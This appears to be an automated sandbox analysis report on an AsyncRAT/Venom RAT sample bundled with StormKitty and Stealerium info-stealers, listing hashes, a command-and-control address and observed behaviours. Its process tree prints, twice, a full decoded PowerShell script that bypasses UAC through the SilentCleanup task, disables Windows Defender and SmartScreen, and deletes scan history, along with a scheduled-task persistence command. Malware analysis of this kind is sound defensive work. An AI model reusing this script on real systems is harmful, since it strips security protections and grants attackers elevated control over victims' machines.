Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-05-2024 11:06

General

  • Target

    e3f245020bcf6beaca39b8cc9eb06b3db7f209356e765f41d8306ad56735e944.exe

  • Size

    231KB

  • MD5

    144f1b1c4b9cdad97d8dd1a3a89e7ea1

  • SHA1

    1a11d76a6ab646a0d699efa0e5fc71de6e5af92c

  • SHA256

    e3f245020bcf6beaca39b8cc9eb06b3db7f209356e765f41d8306ad56735e944

  • SHA512

    2697bde82afdef6b3e9079e9add7a9026fffec2a9093932d6c05256fe73df0ef9a2fac4f26de28e2b5d87cc7dd0651dac80baa2a3841148409ab2c3ea32b6882

  • SSDEEP

    6144:TZ+geAPqybJnO5AbpbO9jhJdrz8U6n4eOP07NyGyG2qYlw5S3U19:T4FvybJNpazzfoyG

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

66.235.168.242:4449

Mutex

scgofjarww

Attributes
  • delay

    1

  • install

    true

  • install_file

    Loader.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Botnet

Default

C2

66.235.168.242:3232

Attributes
  • delay

    1

  • install

    true

  • install_file

    Loaader.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Stealerium

    An open source info stealer written in C# first seen in May 2022.

  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • UAC bypass 3 TTPs 6 IoCs
  • Async RAT payload 2 IoCs
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Launches sc.exe 6 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 6 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e3f245020bcf6beaca39b8cc9eb06b3db7f209356e765f41d8306ad56735e944.exe
    "C:\Users\Admin\AppData\Local\Temp\e3f245020bcf6beaca39b8cc9eb06b3db7f209356e765f41d8306ad56735e944.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3772
    • C:\Users\Admin\AppData\Local\Temp\Client.exe
      "C:\Users\Admin\AppData\Local\Temp\Client.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1948
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\Admin\AppData\Roaming\Loader.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4548
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\Admin\AppData\Roaming\Loader.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:1752
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5738.tmp.bat""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2872
        • C:\Windows\system32\timeout.exe
          timeout 3
          4⤵
          • Delays execution with timeout.exe
          PID:3656
        • C:\Users\Admin\AppData\Roaming\Loader.exe
          "C:\Users\Admin\AppData\Roaming\Loader.exe"
          4⤵
          • UAC bypass
          • Checks computer location settings
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Checks whether UAC is enabled
          • Checks processor information in registry
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:3864
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 
            5⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4552
            • C:\Windows\system32\sc.exe
              "C:\Windows\system32\sc.exe" qc windefend
              6⤵
              • Launches sc.exe
              PID:4584
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
              6⤵
                PID:3660
              • C:\Windows\system32\whoami.exe
                "C:\Windows\system32\whoami.exe" /groups
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4356
              • C:\Windows\system32\net1.exe
                "C:\Windows\system32\net1.exe" start TrustedInstaller
                6⤵
                  PID:1844
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
